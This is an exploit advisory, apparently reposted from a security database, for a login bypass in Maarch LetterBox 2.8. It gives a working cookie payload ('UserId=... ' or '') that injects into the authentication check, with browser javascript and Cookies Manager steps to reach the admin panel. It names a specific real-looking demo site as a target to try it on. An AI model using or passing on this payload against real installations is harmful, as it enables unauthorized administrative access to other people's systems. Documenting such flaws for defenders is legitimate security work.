Maarch LetterBox 2.8 Insecure Cookie Handling

2014.11.18
Credit: ZoRLu
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass) # Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com # Home : http://milw00rm.com / its online # Date : 17.11.2014 # Demo : http://www.era.sn/courrier # Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip # Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others you first go here: http://www.target.com/path/index.php?page=welcome.php you will go login.php, but if we change our cookie's with this exploit we will be login admin panel. exploit: javascript:document.cookie = "UserId=[username] ' or '; path=/"; or you edit your cookie's with "Cookies Manager" name = maarch contents = UserId=username ' or ' host = your target path = /script_path/ and dont change other options its keep default. for demo: javascript:document.cookie = "UserId=demo ' or '; path=/"; or with Cookies Manager (demo has 2 user demo and demo2 you can test for 2 user) name = maarch contents = UserId=demo ' or ' / for other users UserId=demo2 ' or ' host = www.era.sn path = / and save it after go here: http://www.era.sn/courrier/index.php?page=welcome.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top